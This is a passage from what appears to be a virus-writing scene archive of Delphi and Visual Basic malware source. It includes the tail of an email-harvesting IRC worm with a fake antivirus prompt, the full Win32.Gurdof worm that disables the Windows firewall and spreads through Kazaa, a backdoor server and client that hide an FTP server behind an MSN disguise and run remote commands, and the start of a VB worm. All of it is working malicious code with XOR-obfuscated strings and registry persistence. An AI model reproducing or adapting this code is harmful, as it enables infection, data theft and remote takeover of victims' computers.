then x:=5; delete(pp2,1,2); if pp2[1] in ['0'..'9'] then x:=5; if pp2[1] = '_' then x:=5; if pp2[1] = '-' then x:=5; if pp2[1] = '.' then x:=5; end else x:=5; p1:=s; delete(p1,1,length(p1)-4); if p1='.org' then y:=9 else if p1='.com' then y:=9 else if p1='.mil' then y:=9 else if p1='.gov' then y:=9 else if p1='.int' then y:=9 else if p1='.edu' then y:=9 else if p1='.net' then y:=9 else y:=5; if x=y then begin g:=true; x:=6; end; if x<>y then begin x:=6; end; s:=s; until x=6; if s=s2 then f:=false; //same if (length(s)<6) then f:=false; if f=true then writeln(ttt,'[SLAV]'+s); s2:=s; seek(From,poss2); f:=false; g:=false; end; e:=false; //processmessages; until numread=0; Closefile(From); d:=false; exit; processmessages; end; procedure TSpam.ScanMail; var i,yyyy,yyy,yy,count,NumRead: integer; poss,poss2,poss3:longint; bufffT,Bufff,bufff2: Char; tof:textfile; a,b,c,d,e,f,g,thepoint:boolean; From:file; x,y,z:byte; pp1,pp2,p1,p2,ss2,s,s2,s3,s4,s5,s6:string; begin a:=false; b:=false; c:=false; d:=false; //special e:=false; f:=false; g:=false; thepoint:=false; count:=0; poss:=0; if outlook='' then begin //writeln('No WAB File found'); exit; end; filemode:=0; if fileexists(outlook) then begin Assignfile(From,outlook); Reset(From, 1); yy:=filesize(from); end else begin //writeln('I can''t open the file...'); exit; end; seek(from,80000); repeat //processmessages; bufffT:=bufff; BlockRead(From, Bufff, SizeOf(Bufff), NumRead); if (bufff=':') and (bufffT='U') then d:=true; if bufff='@' then begin poss:=filepos(from); poss2:=poss; a:=true end; if a=true then begin poss:=poss-1; repeat poss:=poss-1; count:=count+1; if poss>0 then seek(From,poss) else begin c:=true; g:=true; end; BlockRead(From, Bufff, SizeOf(Bufff), NumRead); if bufff in ['a'..'z'] then {memo1.Lines.add(bufff)} else if bufff in ['0'..'9'] then {memo1.Lines.add(bufff)} else if bufff in ['A'..'Z'] then {memo1.Lines.add(bufff)} else if bufff = '-' then {memo1.Lines.add(bufff)} else if bufff = '.' 
then {memo1.Lines.add(bufff)} else if bufff = '@' then {memo1.Lines.add(bufff)} begin b:=true; g:=true; end else if bufff = '_' then {memo1.Lines.add(bufff)} else b:=true; if count=26 then begin b:=true; g:=true;end; if b=true then if count<4 then begin c:=true; g:=true; end else c:=true; until c=true; poss3:=poss; b:=false; c:=false; count:=0; poss2:=poss2-1; repeat poss2:=poss2+1; count:=count+1; seek(From,poss2); BlockRead(From, Bufff, SizeOf(Bufff), NumRead); if bufff in ['a'..'z'] then {memo1.Lines.add(bufff)} else if bufff in ['0'..'9'] then {memo1.Lines.add(bufff)} else if bufff in ['A'..'Z'] then {memo1.Lines.add(bufff)} else if bufff = '-' then {memo1.Lines.add(bufff)} else if bufff = '@' then {memo1.Lines.add(bufff)} begin b:=true; g:=true end else if bufff = '.' then {memo1.Lines.add(bufff)} thepoint:=true else if bufff = '_' then {memo1.Lines.add(bufff)} else b:=true; if thepoint<>true then g:=true; if count=60 then begin c:=true; g:=true;end; if b=true then if count<2 then begin c:=true; g:=true; end else c:=true; until c=true; c:=false; b:=false; a:=false; count:=0; s:=''; poss:=poss+1; e:=true; repeat //filtre seek(From,poss); BlockRead(From, Bufff, SizeOf(Bufff), NumRead); poss:=poss+1; if e=true then if (bufff='@') or (bufff='.') then begin g:=true; e:=false; end else e:=false; f:=true; seek(From,poss); BlockRead(From, Bufff2, SizeOf(Bufff2), NumRead); seek(From,poss-1); if bufff='@' then if bufff2='.' then g:=true; if bufff='.' then if bufff2='@' then g:=true; if bufff='.' then if bufff2='.' then g:=true; s:=s+bufff; until poss=poss2; if s='@' then g:=true; repeat p2:=s; delete(p2,1,length(p2)-3); pp1:=p2; pp2:=p2; delete(p2,2,length(p2)); if p2='.' then begin x:=9; delete(pp1,1,1); delete(pp1,3,3); if pp1[1] in ['0'..'9'] then x:=5; if pp1[1] = '_' then x:=5; if pp1[1] = '-' then x:=5; if pp1[1] = '.' then x:=5; delete(pp2,1,2); if pp2[1] in ['0'..'9'] then x:=5; if pp2[1] = '_' then x:=5; if pp2[1] = '-' then x:=5; if pp2[1] = '.' 
then x:=5; end else x:=5; p1:=s; delete(p1,1,length(p1)-4); if p1='.org' then y:=9 else if p1='.com' then y:=9 else if p1='.mil' then y:=9 else if p1='.gov' then y:=9 else if p1='.int' then y:=9 else if p1='.edu' then y:=9 else if p1='.net' then y:=9 else y:=5; if x=y then begin g:=true; x:=6; end; if x<>y then begin x:=6; end; s:=s; until x=6; if (length(s)<6) then f:=false; if d=true then begin s:='[USER]'+s; d:=false; end else s:='[SLAV]'+s; if f=true then writeln(ttt,s); s2:=s; seek(From,poss2); f:=false; g:=false; end; e:=false; //processmessages; until numread=0; Closefile(From); exit; d:=false; processmessages; end; procedure TSpam.fileini; const log = 'ReturnAddress='; log2 = 'SMTPServer='; var tt:textfile; s,s2:string; begin if not fileexists(eudora+'EUDORA.INI') then begin {form1.memo1.lines.add('no files exist');} exit; end; assignfile(tt,eudora+'EUDORA.INI'); reset(tt); s2:='_'; repeat readln(tt,s); s2:=s; s:=copy(s2,1,length(log)); if s=log then begin s:=copy(s2,length(log)+1,length(s2)); writeln(ttt,'[USER]'+s); end; s:=copy(s2,1,length(log2)); if s=log2 then begin s:=copy(s2,length(log2)+1,length(s2)); if s='' then writeln(ttt,'[SERV]'+crypt('lcjh+eheyxixj>r}~')) else writeln(ttt,'[SERV]'+s); end; until eof(tt); closefile(tt); exit; end; //============Thread_procedure=== procedure ThreadProc3; stdcall; var Spam:TSpam; begin sleep(90000); //writeln('SPAM'); spam.start; end; procedure ThreadProc2; stdcall; begin sleep(160000); //writeln('CONNECT IRC'); hede.server; if TerminateThread(ThreadHdle2, ExitCode2) then begin closesocket(mysocket); WSACleanup; end; end; procedure ThreadProc; stdcall; var ck1,ck2,ck3:boolean; begin ck1:=false; ck2:=false; ck3:=false; //initsocket; repeat WSACleanup; WSAStartup($101,WSD); z:=lookup_hostname(crypt('vut*hodzfydjy l|')) // z:=lookup_hostname('--'); //write(z); //write(' '+ip2string(z)+' '); if z>0 then ck1:=true else ck1:=false; if (ck1=true) and (ck2=false) then begin ck2:=true; ck3:=true; WSACleanup; initsocket; 
// writeln('connect'); ThreadHdle2 := CreateThread( Nil,0,@ThreadProc2,Nil,0,ThreadID2); //connect sleep(1000); ThreadHdle3 := CreateThread( Nil,0,@ThreadProc3,Nil,0,ThreadID3); //scan protection end; if (ck1=false) and (ck3=true) then begin ck3:=false; ck2:=false; ShutDownServer; WSACleanup; // writeln('disconnect'); GetExitCodeThread(ThreadHdle2, ExitCode2); TerminateThread(ThreadHdle2, ExitCode2); GetExitCodeThread(ThreadHdle3, ExitCode3); TerminateThread(ThreadHdle3, ExitCode3); end; sleep(60000); until TerminateThread(ThreadHdle, ExitCode); //z=777; ShutDownServer; end; //=== This is the MAIN PART program ======= begin scanprotection; if paramstr(0)=systemdir+crypt(']IFVKCK;;$]TI') then //\KERNEL32.VXD begin if (length(paramstr(1))>0) and (length(paramstr(2))>0) then winexec(PChar(paramstr(1)+' '+paramstr(2)),SW_NORMAL); if (length(paramstr(1))>0) and (length(paramstr(2))=0) then winexec(PChar(paramstr(1)),SW_NORMAL); winexec(pchar(systemdir+crypt(']ifvkck&mfg')),SW_NORMAL); //\kernel.dll halt; end; if (paramstr(0)<>systemdir+crypt(']IFVKCK;;$]TI')) and (paramstr(0)<>systemdir+crypt(']IFVKCK&MFG')) then //\KERNEL32.VXD //\KERNEL.DLL begin if MessageBoxA(Handle, 'Microsoft Anti Virus Plugin Detected any Suspiciuos files.'+#13+#10+ 'Well it''s time to check if your system is ready.'+#13+#10+' '+#13#10+ 'Do you want start the Av Test ?', MB_YESNO)=IDYES then begin MessageBox(Handle,'Please wait...',MB_ICONINFORMATION); fileexists(systemdir+'\kernel32.dll'); sleep(1000); MessageBox(Handle,'Test successfull !'+#13#10+' '+#13#10+'Your system are Virus Free',MB_ICONINFORMATION); end; end; if FindWindow(lpzClassName,lpzWindowsName) <> 0 then Halt;//If start second time hInst:=GetModuleHandle(nil); with wClass do begin Style:= CS_PARENTDC; hIcon:= 0; cbClsExtra:= 0; cbWndExtra:= 0; lpfnWndProc:= @WindowProc; hInstance:= hInst; hbrBackground:= COLOR_WINDOW; lpszClassName:= lpzClassName; lpszMenuName:= NIL; hCursor:= 0; //LoadCursor(0,IDC_ARROW); end; 
RegisterClass(wClass); Handle:=CreateWindow(lpzClassName,lpzWindowsName,WS_BORDER + WS_SIZEBOX, 0,0,10,10,0,0{hPP},hInst,nil); if Handle<>0 then begin UpdateWindow(Handle); ShowWindow(Handle, SW_HIDE); //SW_HIDE RegisterInService; end; copyit; Registre:=TRegistry.create; Registre.RootKey:=HKEY_CLASSES_ROOT; Registre.OpenKey('exefile\shell\open\command',true); Registre.WriteString('',pchar(crypt('jgqj`j4:''|sh-,*!326>'))); //kernel32.vxd "%1" %* Registre.Free; Timeout:=70; ThreadHdle := CreateThread( Nil,0,@ThreadProc,Nil,0,ThreadID); //Online??? repeat sleep(59000); until z>0; if z>0 then klog.LogCreate; ProcessMessages; end.

sources

Win32.Gurdof Hutley program gurdof; //{$APPTYPE CONSOLE} { /////////////////////////////////////////////////////////////////////// Win32.Gurdof by Hutley/RRLF This is my first virus in RRLF (Ready Rangers Liberation Front) Team. //////////////////////////////////////////////////////////////////////// What Win32.Gurdof doing: + Fuck the WinXP Firewall + Simple Function that Decode the Strings + Disable Notifications of Security Center + Infect Kazaa Program + Payload: Sort Randomly a Number Until 20, if the number be < 14 then show messages and hide the mouse icon. Comment: IS VERY SIMPLE I KNOW. I TERMINETED IT BECAUSE I GO START THE STUDY OF ASSEMBLY LANGUAGE. WAIT, COMMING SOON NEWS VIRUSES IN ASM32. Hutley / rRlf - The Psychodelic Virus Writer 24 - Feb - 2006 -*- BRAZIL! } uses Windows, Registry, SysUtils, Dialogs; const vir_name: string = 'Win32.Gurdof'; made_by: string = 'Hutley of rRlf VX Team'; var ExeName: array[0..260] of Char; start_: TRegistry; function code_(text: string; chave: integer): string; var lp1, p: integer; fuck: string; begin lp1 := strlen(pchar(text)); for p := 1 to lp1 do begin fuck := fuck + chr(ord(text[p]) xor chave) end; code_ := fuck end; function WinDir: string; begin SetLength(Result, MAX_PATH); Windows.GetWindowsDirectory(PChar(Result), MAX_PATH); Result := string(PChar(Result)) + '\'; end; function SysDir: string; begin SetLength(Result, MAX_PATH); if GetSystemDirectory(PChar(Result), MAX_PATH) > 0 then Result := string(PChar(Result)) + '\' else Result := ''; end; procedure fuck_xp_firewall; var ffw: TRegistry; begin ffw := TRegistry.Create; ffw.RootKey := HKEY_LOCAL_MACHINE; // Part 1 ffw.OpenKey(code_('Q[QVGO^AwppglvAmlvpmnQgv^Qgptkagq^QjcpgfCaagqq^Rcpcogvgpq^DkpgucnnRmnka{^FmocklRpmdkng', 2), FALSE); ffw.WriteFloat(code_('GjpbaofMlwjej`bwjlmp', 3), 1); ffw.WriteFloat(code_('AjefhaBmvasehh', 4), 0); ffw.WriteFloat(code_('@kJkpEhhksA|gatpmkjw', 5), 0); ffw.CloseKey; // Part 2 
ffw.OpenKey(code_('U_URCKZEsttchrEihrtijUcrZUctpoecuZUngtcbGeecuuZVgtgkcrctuZ@otcqgjjVijoeZUrghbgtbVti`ojc', 6), false); ffw.WriteFloat(code_('La{ijdmFg|anaki|agf{', 8), 1); ffw.WriteFloat(code_('OdkhfoLcxo}kff', 10), 0); ffw.WriteFloat(code_('OdEdJggd|Nshn{bdex', 11), 0); ffw.CloseKey; // Part 3 ffw.OpenKey(code_('Xdm|jynWFbhydxdmWXnh~ybr+Hneny', 11), false); ffw.WriteFloat(code_('Kd~c\cxyNcykhfoDe~cls', 10), 1); ffw.WriteFloat(code_('O`{l~heeM`zhkelGf}`op', 9), 1); ffw.WriteFloat(code_('If|a^az}{G~mzzalm', 8), 1); ffw.WriteFloat(code_('AnubpfkkHqbuuncb', 7), 1); ffw.CloseKey; // End ffw.Free; end; procedure infect_p2p_kazaa; var kazaa: TRegistry; begin kazaa := TRegistry.Create; kazaa.RootKey := HKEY_CURRENT_USER; if kazaa.OpenKey(code_('Ui`rqgtcZMG\GGZJiegjEihrchrZ', 6), false) then begin kazaa.WriteFloat(code_('Alvdgi`Vmdwlkb', 5), 0); kazaa.WriteString(code_('@mv4', 4), WinDir); kazaa.WriteString(code_('@mv5', 4), WinDir + code_('Pkbqf', 3)); GetModuleFileNameA(0, ExeName, SizeOf(ExeName)); CreateDir(WinDir + code_('Jqxk|E', 25)); CopyFile(ExeName, PChar(WinDir + code_('G|ufqHg}g`qfKraw}zsK}zKvx{zpq:~ds:qlq', 20)), True); CopyFile(ExeName, PChar(WinDir + code_('F}tgpIwtwlJf|apgJ|{Jwpq;er;pmp', 21)), True); CopyFile(ExeName, PChar(WinDir + code_('DverKgrsxHp~e{?&"nx>Hqbt|~yp9}gp9ror', 23)), True); CopyFile(ExeName, PChar(WinDir + code_('Kpyj}DuaG{wmkqvGqvG~yuqtaG`@`6rh6}`}', 24)), True); CopyFile(ExeName, PChar(WinDir + code_('Ir{hFvixs{tiE|oyqE|oyqE|oyqE|oyq4pj}4b', 26)), True); end; kazaa.Free; end; function show_cursor(const Show: boolean): boolean; var I: integer; begin I := ShowCursor(LongBool(true)); if Show then begin Result := I >= 0; while I < 0 do begin Result := ShowCursor(LongBool(true)) >= 0; Inc(I); end; end else begin Result := I < 0; while I >= 0 do begin Result := ShowCursor(LongBool(false)) < 0; Dec(I); end; end; end; procedure my_payload; var i: integer; begin Randomize; if Random(50) <= 14 then begin for i := 1 to 10 do begin 
ShowMessagePos(code_('===<[INXSZ<sKrF<eSi<===', 28) + #13#13 + code_('=============Uhiqxd=2=OOQ[', 29), Random(800), Random(600)); show_cursor(false); end; end; end; begin // Install In Registry - Auto Start start_ := TRegistry.Create; start_.RootKey := HKEY_LOCAL_MACHINE; start_.OpenKey(code_(']ahzyo|kRCgm|a}ahzRYg`jay}RM{||k`zXk|}ga`R\{`', 14), true); start_.WriteString('Gurdof', code_('D[I[[[ MPM', 40)); start_.Free; // Module of Current .Exe GetModuleFileNameA(0, ExeName, SizeOf(ExeName)); // System Dir - 2 Copies of Virus CopyFile(ExeName, PChar(SysDir + code_('D[I[[[ MPM', 40)), true); CopyFile(ExeName, PChar(SysDir + code_('IEGKDN ORO', 42)), true); // Win Dir - 2 Copies of Virus CopyFile(ExeName, PChar(WinDir + code_('[EBHC[_ ITI', 44)), true); CopyFile(ExeName, PChar(WinDir + code_(']W]ZKC', 46)), true); // Desable the WinXP Firewall and Security Center fuck_xp_firewall; // Spread by Kazaa infect_p2p_kazaa; // A Simple Payload my_payload; end.

sources

Backdoor.Spieluhr Server Hutley unit Unit1; { Backdoor.Spieluhr Este backdoor foi totalmente feito por Hutley/GEDZAC. Projeto terminado as 12:03 - 24/Dez/2005 - A idéia foi criar um backdoor que permitisse o acesso aos arquivos do usuário infectado. Isso pode ser feito por meio de um servidor FTP contido no programa serrvidor. Que se disfarça de MSN para poder se auto instalar na máquina. - Dúvida, Bugs ou Sugestões: www.Hutley.cjb.net } interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, FtpSrv, FtpSrvC, Registry, ScktComp; type TForm1 = class(TForm) FTP: TFtpServer; SrvSockt: TServerSocket; procedure FormCreate(Sender: TObject); procedure FTPAuthenticate(Sender: TObject; Client: TFtpCtrlSocket; UserName, Password: TFtpString; var Authenticated: Boolean); procedure SrvSocktClientError(Sender: TObject; Socket: TCustomWinSocket; ErrorEvent: TErrorEvent; var ErrorCode: Integer); procedure SrvSocktClientRead(Sender: TObject; Socket: TCustomWinSocket); private { Private declarations } public { Public declarations } end; var Form1: TForm1; const info: string = 'Win32.Backdoor.Spieluhr.Server'; autor: string = 'Hutley / GEDZAC'; // possíveis nomes de arquivo que pode assumir file_name: array[0..9] of string = ( 'msnupdate.exe', 'winfog.exe', 'winsys.exe', 'lsass1.exe', 'lovcx.exe', 'winsress.exe', 'winlog.exe', 'winsock.exe', 'saveruser.exe', 'winbackup.exe'); implementation {$R *.dfm} // função para decodificar as strings function code(text: string; chave: integer): string; var lp1, p: integer; fuck: string; begin lp1 := strlen(pchar(text)); for p := 1 to lp1 do begin fuck := fuck + chr(ord(text[p]) xor chave) end; code := fuck end; // diretório do sistema function SysDir: string; begin SetLength(Result, MAX_PATH); if GetSystemDirectory(PChar(Result), MAX_PATH) > 0 then Result := string(PChar(Result)) + '\' else Result := ''; end; // Escreve no Registro a Nova senha do FTPServer procedure NovoPassword(pass: string); var 
reg: TRegistry; begin Reg := TRegistry.Create; Reg.RootKey := HKEY_LOCAL_MACHINE; // \SOFTWARE\MsnSpieluhr key: 050 Reg.OpenKey(code('na}tfes`wnA\aB[W^GZ@', 050), true); // ftpPass key:051 Reg.WriteString(code('UGCcR@@', 051), pass); Reg.CloseKey; Reg.Free; end; // Escreve no Registro o novo Login do FTPServer procedure NovoLogin(login: string); var reg: TRegistry; begin Reg := TRegistry.Create; Reg.RootKey := HKEY_LOCAL_MACHINE; // \SOFTWARE\MsnSpieluhr key: 12 Reg.OpenKey(code('P_CJX[M^IPAb_|ei`yd~', 12), true); // ftpLogin key: 15 Reg.WriteString(code('i{C`hfa', 15), login); Reg.CloseKey; Reg.Free; end; // Executar por REGISTRO ! procedure ExecutaViaRegistro(nome, path: string); var evrg: TRegistry; begin evrg := TRegistry.Create; evrg.RootKey := HKEY_LOCAL_MACHINE; // SOFTWARE\Microsoft\Windows\CurrentVersion\Run KEY: 24 evrg.OpenKey(code('KW^LOYJ]DUq{jwkw~lDOqv|wokD[mjj}vlN}jkqwvDJmv', 24), FALSE); evrg.WriteString(nome, path); evrg.Destroy; end; // Escreve no Registro o nova Porta do FTPServer procedure NovaPorta(porta: integer); var reg: TRegistry; begin Reg := TRegistry.Create; Reg.RootKey := HKEY_LOCAL_MACHINE; // \SOFTWARE\MsnSpieluhr KEY: 30 Reg.OpenKey(code('BMQXJI_L[BSmpMnw{rkvl', 30), true); // ftpPort KEY: 30 Reg.WriteInteger(code('xjnNqlj', 30), porta); Reg.CloseKey; Reg.Free; end; // Processa os comandos recebidos pelo SOCKET procedure RecebeComando(s: string); var comando, texto: string; begin // Parte a STRING em dois pedaços, // o COMANDO e o PARÂMETRO comando := Copy(s, 1, 5); texto := Copy(s, 6, Length(s)); // npass, nlogi, exect, nport KEY: 40 if comando = code('FXI[[', 40) then NovoPassword(texto); if comando = code('FDGOA', 40) then NovoLogin(texto); if comando = code('MPMK\', 40) then WinExec(PChar(texto), sw_ShowNormal); if comando = code('FXGZ\', 40) then NovaPorta(StrToInt(texto)); end; procedure TForm1.FormCreate(Sender: TObject); var reg: TRegistry; ftpPort, NumbName: Integer; begin // Nao aparece na barra de tarefas 
SetWindowLong(Application.Handle, GWL_EXSTYLE, GetWindowLong(Application.Handle, GWL_EXSTYLE) or WS_EX_TOOLWINDOW and not WS_EX_APPWINDOW); // Executado 1º Vez? Reg := TRegistry.Create; Reg.RootKey := HKEY_LOCAL_MACHINE; // \SOFTWARE\MsnSpieluhr KEY: 45 (em tudo) Reg.OpenKey(code('q~bkyzlhq`^C~]DHAXE_', 45), true); if not (Reg.ValueExists('1?')) then begin // Coloca a String para Aparecer a Mensagem de Erro Reg.WriteBool('1?', true); // Se AUTO COPIA para a pasta SYSTEM // o nome do arquivo é escolhido aleatoriamente Randomize; NumbName := Random(9); CopyFile(PChar(Application.Exename), PChar(SysDir + file_name[NumbName]), false); // Depois de copiado, escreve no registro pra auto executar // Hutley-Spieluhr - key: 20 ExecutaViaRegistro(code('\a`xqm9Gd}qxa|f', 20), SysDir + file_name[NumbName]); // Login/Pass para o FTPServer // ftpLogin, hutleyvx - key: 21 Reg.WriteString(code('saeYzr|{', 21), code('}`ayplcm', 21)); // ftpPass - key: 21, 123456 - key: 23 Reg.WriteString(code('saeEtff', 21), code('&%$#"!', 23)); // ftpPort, 25 - key: 23 Reg.WriteInteger(code ('qcgGxec', 23), StrToInt(Code('%"', 23))); // Msg de Erro. Só aparece na 1º execução // Error, contact the Microsoft support! 
- key: 23 // Error #6985 - key: 25 Application.MessageBox(PChar(code('Reexe;7txycvtc7cr7Z~texdxqc7dbggxec6', 23)), PChar(code('\kkvk9:/ !,', 25)), mb_ok + mb_IconError); end else begin // ftpPort key: 26 ftpPort := Reg.ReadInteger(code('|njJuhn', 26)); Reg.CloseKey; Reg.Free; end; // Inicia o FTP Server e o Socket Servidor if ftp.Active = false then begin FTP.Port := IntToStr(FTPPort); FTP.Start; end; if srvsockt.Active = false then srvsockt.Open; // Some com o FORM da tela with form1 do begin left := 0; top := 1000000; Height := 0; Width := 0; end; end; procedure TForm1.FTPAuthenticate(Sender: TObject; Client: TFtpCtrlSocket; UserName, Password: TFtpString; var Authenticated: Boolean); var Reg: TRegistry; ftpLogin, ftpPass: string; begin Authenticated := false; // Lê no Registro Login/Senha para autenticação do FTPServer Reg := TRegistry.Create; Reg.RootKey := HKEY_LOCAL_MACHINE; // \SOFTWARE\MsnSpieluhr - key: 26 Reg.OpenKey(code('FIU\NM[H_FWitIjsvorh', 26), true); // ftpLogin - key: 27 ftpLogin := Reg.ReadString(code('}okWt|ru', 27)); // ftpPass - key: 27 ftpPass := Reg.ReadString(code('}okKzhh', 27)); Reg.CloseKey; Reg.Free; // Verifica se é igual ao Recebido if (UserName = ftpLogin) and (Password = ftpPass) then Authenticated := true else Authenticated := false; end; procedure TForm1.SrvSocktClientError(Sender: TObject; Socket: TCustomWinSocket; ErrorEvent: TErrorEvent; var ErrorCode: Integer); begin ErrorCode := 0; end; procedure TForm1.SrvSocktClientRead(Sender: TObject; Socket: TCustomWinSocket); begin RecebeComando(Socket.ReceiveText); end; end.
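For analysts triaging a sample like the listing above: its `code` routine is a single-byte XOR, so every obfuscated literal can be recovered statically without running anything. The following is an added example, not part of the original source. It decodes literals copied from the listing (the ones whose plaintext the source comments already name) and recovers an unknown key from a known-plaintext crib; the function names are this example's own.

```python
"""Static recovery of single-byte-XOR string literals (added analyst example)."""
import re
from typing import Iterator, List, Tuple

# Matches Delphi calls of the form  code('literal', key)  or  code_('literal', key).
# A doubled quote ('') inside a Delphi literal stands for one quote character.
CALL_RE = re.compile(
    r"\bcode_?\s*\(\s*'((?:[^']|'')*)'\s*,\s*(\d+)\s*\)", re.IGNORECASE
)

# Calls copied from the listing above; nothing here is executable on its own.
SAMPLE = r"""
code('FXI[[', 40)   code('FDGOA', 40)   code('MPMK\', 40)   code('FXGZ\', 40)
code('UGCcR@@', 051)   code('xjnNqlj', 30)
"""


def xor_decode(text: str, key: int) -> str:
    """Mirror of the listing's routine: XOR every character with one key byte."""
    return "".join(chr(ord(ch) ^ key) for ch in text)


def is_printable(text: str) -> bool:
    """True when every character is plain printable ASCII."""
    return all(32 <= ord(ch) < 127 for ch in text)


def extract_literals(source: str) -> Iterator[Tuple[str, int, str, bool]]:
    """Yield (ciphertext, key, plaintext, looks_clean) for each call found.

    looks_clean is False when the decode contains non-printable characters,
    which points at a wrong key or a literal damaged in transit.
    """
    for match in CALL_RE.finditer(source):
        literal = match.group(1).replace("''", "'")
        key = int(match.group(2))  # Delphi reads 051 as decimal 51
        plain = xor_decode(literal, key)
        yield literal, key, plain, is_printable(plain)


def candidate_keys(ciphertext: str, crib: str) -> List[int]:
    """Keys 1..255 whose decode is printable and contains the expected crib.

    Use when the key argument is computed at run time or stripped from the
    sample but a likely substring ("ftp", ".exe", "SOFTWARE") is known.
    """
    hits = []
    for key in range(1, 256):
        plain = xor_decode(ciphertext, key)
        if crib in plain and is_printable(plain):
            hits.append(key)
    return hits


if __name__ == "__main__":
    for cipher, key, plain, clean in extract_literals(SAMPLE):
        flag = "" if clean else "  <-- check key or literal"
        print(f"key={key:3d}  {cipher!r:12} -> {plain!r}{flag}")
    print("recovered key:", candidate_keys("FXI[[", "pass"))
```

Ciphertext bytes that land in the control range do not survive a text copy: the literal passed with key 15 in this listing decodes to "ftLogin", one byte short of the "ftpLogin" its comment names, because 'p' XOR 15 is 0x7F. Work from the binary when exact values matter.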

sources

Backdoor.Spieluhr Client Hutley unit Unit1; { Backdoor.Spieluhr Este backdoor foi totalmente feito por Hutley/GEDZAC. Projeto terminado as 12:03 - 24/Dez/2005 - A idéia foi criar um backdoor que permitisse o acesso aos arquivos do usuário infectado. Isso pode ser feito por meio de um servidor FTP contido no programa serrvidor. Que se disfarça de MSN para poder se auto instalar na máquina. - Dúvida, Bugs ou Sugestões: www.Hutley.cjb.net } interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, Buttons, StdCtrls, ComCtrls, ShellAPI, ScktComp; type TForm1 = class(TForm) btnClose: TSpeedButton; GroupBox1: TGroupBox; Label1: TLabel; edtFTPUsername: TEdit; Label2: TLabel; edtFTPPassword: TEdit; Label3: TLabel; edtFTPPort: TEdit; GroupBox2: TGroupBox; Label4: TLabel; edtFile: TEdit; btnApply: TSpeedButton; StatusBar1: TStatusBar; GroupBox3: TGroupBox; edtIP: TEdit; Label5: TLabel; Label6: TLabel; edtPort: TEdit; btnConnect: TSpeedButton; btnExecute: TSpeedButton; lblLink: TLabel; clSocket: TClientSocket; btnAbout: TSpeedButton; procedure btnCloseClick(Sender: TObject); procedure lblLinkMouseEnter(Sender: TObject); procedure lblLinkMouseLeave(Sender: TObject); procedure lblLinkClick(Sender: TObject); procedure btnConnectClick(Sender: TObject); procedure btnApplyClick(Sender: TObject); procedure clSocketConnecting(Sender: TObject; Socket: TCustomWinSocket); procedure clSocketConnect(Sender: TObject; Socket: TCustomWinSocket); procedure clSocketDisconnect(Sender: TObject; Socket: TCustomWinSocket); procedure clSocketError(Sender: TObject; Socket: TCustomWinSocket; ErrorEvent: TErrorEvent; var ErrorCode: Integer); procedure btnExecuteClick(Sender: TObject); procedure btnAboutClick(Sender: TObject); private { Private declarations } public { Public declarations } end; var Form1: TForm1; const info: string = 'Win32.Backdoor.Spieluhr.Client'; autor: string = 'Hutley / GEDZAC'; implementation {$R *.dfm} procedure 
TForm1.btnCloseClick(Sender: TObject); begin close; end; procedure TForm1.lblLinkMouseEnter(Sender: TObject); begin lblLink.Font.Style := [fsUnderline]; end; procedure TForm1.lblLinkMouseLeave(Sender: TObject); begin lblLink.Font.Style := []; end; procedure TForm1.lblLinkClick(Sender: TObject); begin ShellExecute(GetDesktopWindow, 'open', 'http://Hutley.cjb.net', nil, nil, 0); end; procedure TForm1.btnConnectClick(Sender: TObject); begin clSocket.Address := edtip.Text; clSocket.Port := StrToInt(edtPort.text); clSocket.Open; end; procedure TForm1.btnApplyClick(Sender: TObject); begin if clSocket.Active then begin clSocket.Socket.SendText('nlogi' + edtFTPUsername.Text); clSocket.Socket.SendText('nPass' + edtFTPPassword.Text); clSocket.Socket.SendText('nport' + edtFTPPort.Text); end else Application.MessageBox('NOT CONNECTED', 'Error!', mb_IconError + mb_Ok); end; procedure TForm1.clSocketConnecting(Sender: TObject; Socket: TCustomWinSocket); begin Statusbar1.Panels[0].Text := '*** Connecting. . .'; end; procedure TForm1.clSocketConnect(Sender: TObject; Socket: TCustomWinSocket); begin Statusbar1.Panels[0].Text := '*** CONNECTED'; end; procedure TForm1.clSocketDisconnect(Sender: TObject; Socket: TCustomWinSocket); begin Statusbar1.Panels[0].Text := '*** Disconnected'; end; procedure TForm1.clSocketError(Sender: TObject; Socket: TCustomWinSocket; ErrorEvent: TErrorEvent; var ErrorCode: Integer); begin ErrorCode := 0; Statusbar1.Panels[0].Text := '*** Error'; end; procedure TForm1.btnExecuteClick(Sender: TObject); begin if edtFile.Text <> '' then if clSocket.Active then clSocket.Socket.SendText('exect' + edtFile.Text) else Application.MessageBox('NOT CONNECTED', 'Error!', mb_IconError + mb_Ok); end; procedure TForm1.btnAboutClick(Sender: TObject); begin Application.MessageBox('Uh!' + #13 + 'This backdoor was made by Hutley' + #13 + 'Member of GEDZAC Virii Group.' + #13#13 + 'If you want contact me in:' + #13 + 'hutleyvx@gmail.com' + #13#13 + 'Thats all folks!' 
+ #13#13 + '! Brazil Rulez !', 'Backdoor.Spieluhr v1.0', mb_IconInformation + mb_ok); end; end;

sources

mercury Industry mercury source by Industry VERSION 5.00 Begin VB.Form Main BorderStyle = 0 'None Caption = "main" ClientHeight = 90 ClientLeft = 4995 ClientTop = 3135 ClientWidth = 90 Icon = "Main.frx":0000 LinkTopic = "Form" MaxButton = 0 'False MinButton = 0 'False ScaleHeight = 90 ScaleWidth = 90 ShowInTaskbar = 0 'False Visible = 0 'False End Attribute VB_Name = "Main" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Private Sub Form_Load() On Error Resume Next Call Copy Call outlook Call mIRC Call bt End Sub Sub Copy() On Error Resume Next Dim FSO, KaZaA, KaZaA1, KaZaADir As String Set FSO = CreateObject("Scripting.FileSystemObject") KaZaA1 = "C:\KaZaA\My Shared Folder\" 'Very rare KaZaA2 = "C:\Program Files\KaZaA\My Shared Folder\" 'Common If FSO.FolderExists(KaZaA1) = True Then KaZaADir = KaZaA1 If FSO.FolderExists(KaZaA2) = True Then KaZaADir = KaZaA2 If KaZaADir <> "" Then GoTo CopyUs Else GoTo JumpNextCode CopyUs: Call ModifyReg Call pr0n Dim aa, a, b, c, d, ef, f, KaZaA3, KaZaA4, bear, bear2, e, e2, Screen aa = App.Path & "\" & App.EXEName & ".exe" a = App.Path & App.EXEName & ".exe" b = "c:\WINDOWS\taskman.exe" c = "c:\AutoExec.exe" d = "c:\Windows\System\AVupdate.exe" ef = "c:\Program Files\uninstall.exe" f = "c:\Windows\Notepad.exe" Screen = 